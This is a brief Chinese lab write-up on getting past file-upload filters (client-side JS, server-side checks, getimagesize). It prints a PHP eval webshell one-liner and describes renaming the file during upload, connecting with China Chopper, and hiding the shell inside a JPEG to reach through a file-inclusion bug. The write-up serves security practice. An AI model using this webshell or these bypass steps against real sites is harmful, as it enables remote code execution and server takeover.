0x01 客户端check
新建一个1.jpg,内容是<?php @eval($_POST['test']);?>
选择1.jpg后,上传同时抓包
结果成功上传1.php文件
用中国菜刀连接
实际上这题是用前端js进行验证选择的文件是否为图片
所以我们把上面input的onchange属性删除就触发不了js代码了
0x02 服务端check
按照上题抓包改名方法能上传成功
0x03 getimagesize()
这题用图片合成木马绕过
我用edjpgcom直接合成了
可以看到这个一句话就藏在图片里
直接上传
访问一下
但他只是一张图片,无法执行php代码,这时候要用上前面文件包含漏洞包含他
可是当我想包含的时候报错了╮(╯▽╰)╭
参考文章